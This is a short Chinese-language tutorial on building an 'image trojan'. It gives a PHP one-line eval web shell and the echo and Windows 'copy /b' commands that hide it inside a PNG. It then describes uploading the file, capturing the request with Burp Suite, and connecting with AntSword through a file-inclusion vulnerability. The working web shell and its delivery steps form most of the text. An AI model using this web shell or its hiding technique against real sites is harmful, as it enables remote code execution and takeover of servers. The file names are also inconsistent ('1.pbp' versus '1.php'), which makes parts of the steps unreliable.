图片木马需要利用文件包含漏洞或者解析漏洞执行一句话木马,单纯的图片无法执行代码。
1、文本方式打开图片直接粘贴一句话木马
打开图片文件 muma.png 在末尾添加一句话木马:<?php @eval($_POST[cmd]);?>
注意:图片就无法正常打开了
在上传图片,使用 burpsuite 抓包,可以看到一句话木马代码内容
使用蚁剑进行连接,利用文件包含漏洞加载图片木马,可以成功连接。
2、使用 Windows 的 copy 命令
如果是Linux,直接 echo "<?php @eval($_POST['cmd']);?>" >> muma.png
准备一张正常的(muma.png),新建一个文件内容写入一句话木马代码(1.pbp)
<?php @eval($_POST[cmd]);?>
使用 copy 命令生成图片木马 shell.png
copy /b muma.png + 1.php/a = shell.png
注意:shell.png 可以正常当作图片打开。使用文本编辑器打开后可以看到一句话木马代码。
上传,抓包,可以看到代码。
使用蚁剑进行连接,利用文件包含漏洞加载图片木马,可以成功连接。
